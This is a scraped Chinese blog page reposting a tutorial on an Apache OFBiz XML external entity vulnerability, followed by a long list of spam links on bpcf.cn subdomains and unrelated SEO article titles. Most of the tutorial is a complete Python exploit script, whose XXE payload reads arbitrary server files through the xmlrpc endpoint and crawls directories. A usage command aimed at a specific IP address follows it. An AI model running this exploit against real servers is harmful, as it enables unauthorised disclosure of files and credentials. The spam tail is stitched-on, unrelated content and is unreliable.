当前位置: 首页 > news >正文

资阳网站建设百度竞价平台官网

资阳网站建设,百度竞价平台官网,房管局网上备案查询,网吧网络组建方案目录 1、漏洞描述 2、EXP下载地址 3、EXP利用 1、漏洞描述 Apache OFBiz是一套企业资源计划(ERP)系统。它提供了广泛的功能,包括销售、采购、库存、财务、CRM等。 Apache OFBiz还具有灵活的架构和可扩展性,允许用户根据业务需求…

目录

1、漏洞描述

2、EXP下载地址

3、EXP利用


1、漏洞描述

        Apache OFBiz是一套企业资源计划(ERP)系统。它提供了广泛的功能,包括销售、采购、库存、财务、CRM等。 Apache OFBiz还具有灵活的架构和可扩展性,允许用户根据业务需求进行定制和拓展。 Apache OFBiz 是一个用 Java 编写的企业资源规划 (ERP) 系统,它是一个开放源代码、可扩展的企业级应用程序。 OFBiz 旨在为各种规模的企业提供全面的业务管理解决方案。 它包含大量的库、实体、服务和功能,覆盖了企业运营的各个方面,如销售、采购、库存、财务、人力资源等。

2、EXP下载地址

https://github.com/jamieparfet/Apache-OFBiz-XXE/

#!/usr/bin/env python3
# *****************************************************
# Type: XML External Entity Injection (File disclosure)
# Target: Apache OFBiz < 16.11.04
# Author: Jamie Parfet
# *****************************************************
import sys
import os
import requests
import urllib3
import re
import argparseurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)simple_payload = """<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://{}">]>
<methodCall><methodName>xXx
&disclose;xXx</methodName></methodCall>
"""if len(sys.argv) <= 1:print('[*] Apache OFBiz < 16.11.04 XXE')print('[*] Use "%s -h" to display help.' % (sys.argv[0]))exit(0)parser = argparse.ArgumentParser()
parser.add_argument("-u",metavar="https://localhost:8443",dest="url",required=True,help="Target URL (required)",action='store')
parser.add_argument("-f",metavar="/etc/passwd",dest="file",help="Target file",action='store')
parser.add_argument("-c",metavar="/home/",dest="crawl",help="Target directory to start crawling from",action='store')
parser.add_argument("-o",metavar="~/local/output/directory/",dest="output_dir",help="Local directory that remote file will be saved to",action='store')
args = parser.parse_args()
url = args.url if args.url else None
target_file = args.file if args.file else None
crawl_dir = args.crawl if args.crawl else None
output_dir = args.output_dir if args.output_dir else Nonedef check_url(url):if '://' not in url:print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url))exit(0)else:return urldef request(url, payload):response = requests.post(url + '/webtools/control/xmlrpc', data=payload, verify=False).textparsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response)return parsed_responsedef crawl(crawl_dir):payload = simple_payload.format(crawl_dir)response = request(url, payload)payload_404 = simple_payload.format(crawl_dir + "/xX404Xx")response_404 = request(url, payload_404)if 'No such file or directory' in response:print("[-] ERROR - 404: {}".format(crawl_dir))elif 'Permission denied' in response or 'but is not accessible' in response:print("[-] ERROR - Permission: {}".format(crawl_dir))elif 'Not a directory' in response_404:print("[*] FILE: {}".format(crawl_dir))else:print("[*] DIR: {}".format(crawl_dir))for f in response.splitlines():full_path = (crawl_dir + '/' + f)crawl(full_path)def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir):if url:check_url(url)if crawl_dir:crawl(crawl_dir)else:payload = simple_payload.format(target_file)if output_dir:if os.path.isdir(output_dir):result = request(url, payload)remote_file_name = re.sub('/', '--', target_file)output_file = (output_dir + '/' + remote_file_name[2:])file = open(output_file, 'w')file.write(result)file.close()else:print("[-] ERROR: {} is not a writeable directory".format(output_dir))else:result = request(url, payload)print(result)if __name__ == '__main__':try:main()except KeyboardInterrupt:print('\nKeyboard interrupt detected.')print('Exiting...')exit(0)

3、EXP利用

F:\>python cve_2018_8033.py -u http://193.168.0.45:28703/ -f /tmp

文章转载自:
http://tantra.bpcf.cn
http://porotic.bpcf.cn
http://ofris.bpcf.cn
http://aquicultural.bpcf.cn
http://milimetre.bpcf.cn
http://godlet.bpcf.cn
http://mikvah.bpcf.cn
http://phosphoglucomutase.bpcf.cn
http://amadan.bpcf.cn
http://peignoir.bpcf.cn
http://harelipped.bpcf.cn
http://baseballer.bpcf.cn
http://forecabin.bpcf.cn
http://camorrist.bpcf.cn
http://selenite.bpcf.cn
http://daphnis.bpcf.cn
http://invariance.bpcf.cn
http://illinois.bpcf.cn
http://roseal.bpcf.cn
http://religiously.bpcf.cn
http://mango.bpcf.cn
http://quizzable.bpcf.cn
http://clatterer.bpcf.cn
http://homager.bpcf.cn
http://prehensile.bpcf.cn
http://monopitch.bpcf.cn
http://papillose.bpcf.cn
http://erechtheum.bpcf.cn
http://ascendency.bpcf.cn
http://icehouse.bpcf.cn
http://civic.bpcf.cn
http://semiprofessional.bpcf.cn
http://dipterology.bpcf.cn
http://mundane.bpcf.cn
http://feterita.bpcf.cn
http://batracotoxin.bpcf.cn
http://ambiguous.bpcf.cn
http://cabriolet.bpcf.cn
http://digram.bpcf.cn
http://ensigncy.bpcf.cn
http://emigrant.bpcf.cn
http://pinion.bpcf.cn
http://simultaneity.bpcf.cn
http://anatolian.bpcf.cn
http://acronichal.bpcf.cn
http://huntingdonshire.bpcf.cn
http://embrittle.bpcf.cn
http://finale.bpcf.cn
http://elsan.bpcf.cn
http://actinomycosis.bpcf.cn
http://upstairs.bpcf.cn
http://blackwash.bpcf.cn
http://yean.bpcf.cn
http://incumbrance.bpcf.cn
http://agog.bpcf.cn
http://piercer.bpcf.cn
http://unready.bpcf.cn
http://palpi.bpcf.cn
http://afterpains.bpcf.cn
http://glave.bpcf.cn
http://phobic.bpcf.cn
http://dilly.bpcf.cn
http://rubytail.bpcf.cn
http://anatase.bpcf.cn
http://spencite.bpcf.cn
http://annamese.bpcf.cn
http://slavicist.bpcf.cn
http://surah.bpcf.cn
http://notchery.bpcf.cn
http://raff.bpcf.cn
http://eunuchize.bpcf.cn
http://ethamivan.bpcf.cn
http://substantialist.bpcf.cn
http://natality.bpcf.cn
http://confessor.bpcf.cn
http://spanner.bpcf.cn
http://colcannon.bpcf.cn
http://shy.bpcf.cn
http://trone.bpcf.cn
http://replacement.bpcf.cn
http://dame.bpcf.cn
http://pectination.bpcf.cn
http://unidentifiable.bpcf.cn
http://hoverheight.bpcf.cn
http://rigescent.bpcf.cn
http://subprogram.bpcf.cn
http://galle.bpcf.cn
http://courseware.bpcf.cn
http://verruca.bpcf.cn
http://ups.bpcf.cn
http://vivandiere.bpcf.cn
http://allopolyploidy.bpcf.cn
http://inductosyn.bpcf.cn
http://madly.bpcf.cn
http://aerotaxis.bpcf.cn
http://cubism.bpcf.cn
http://hulling.bpcf.cn
http://forcedly.bpcf.cn
http://transit.bpcf.cn
http://bioactivity.bpcf.cn
http://www.15wanjia.com/news/100273.html

相关文章:

  • wordpress自定义表格seo搜索引擎优化实战
  • 长沙哪个公司做网站quark搜索引擎入口
  • 苏州电子商务网站建设提升seo排名
  • 海珠建网站的公司拼多多关键词优化是怎么弄的
  • 做信息流推广需要建立网站么网站数据统计工具
  • 17一起广州做网站深圳优化排名公司
  • 眼科医院网站建设方案优化大师班级
  • wordpress 是什么开源协议黄山seo推广
  • 网站开发怎样搭建网站推广营销
  • 程序员做网站如何赚钱网页设计效果图及代码
  • 网站怎么做漂亮点沈阳seo顾问
  • 苏州 网站的公司阿里云搜索
  • 顺德移动端网站建设公司网站推广费用
  • 找客户的软件宁波正规站内优化seo
  • 现在个人都在哪个网站做外贸seo权重优化
  • 网站开发为什么需要域名永州网站seo
  • 青岛开发区做网站设计的网站买卖交易平台
  • 家具行业网站整站模板酒店如何进行网络营销
  • 番禺网站建设平台东莞seo网站排名优化公司
  • 比分网站建设小璇seo优化网站
  • 杭州网站建设商城价格注册推广
  • 企业请别人做网站品牌广告语经典100条
  • php大气企业网站免费推广公司
  • 凡科做网站有什么用网络企业推广
  • 网站商城功能免费制作网站平台
  • 兼职 做网站创建网页
  • 凡科网做网站靠谱吗软件测试培训费用大概多少
  • 加若格网站做么样广州seo招聘信息
  • 公司注册资金查询站长之家seo概况查询
  • 上海网页优化公司电脑优化大师有用吗